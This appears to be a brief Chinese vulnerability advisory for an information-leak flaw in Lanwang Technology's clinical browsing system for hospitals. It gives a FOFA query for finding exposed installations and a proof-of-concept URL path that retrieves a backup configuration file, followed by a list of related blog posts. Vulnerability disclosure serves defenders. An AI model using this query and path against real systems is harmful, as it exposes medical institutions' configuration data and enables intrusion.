Nx01 产品简介
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
Nx02 漏洞描述
蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: title=="临床浏览"
Nx04 漏洞复现
POC:
/config/config%20bak.txt
Nx05 修复建议
建议联系软件厂商进行处理。
相关推荐
痴人说梦梦中人1 小时前
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器Demisse3 小时前
[华为eNSP] OSPF综合实验工控小楠4 小时前
DeviceNet转Modbus TCP网关的远程遥控接收端连接研究搬码临时工4 小时前
电脑同时连接内网和外网的方法,附外网连接局域网的操作设置Web极客码4 小时前
如何轻松、安全地管理密码(新手指南)安全系统学习5 小时前
【网络安全】Qt免杀样本分析程序猿小D5 小时前
第16节 Node.js 文件系统逃逸线LOF5 小时前
Spring Boot论文翻译防丢失 From船长&capBruce_Liuxiaowei5 小时前
文件上传漏洞深度解析:检测与绕过技术矩阵计算机毕设定制辅导-无忧学长5 小时前
从 AMQP 到 RabbitMQ:核心组件设计与工作原理(二)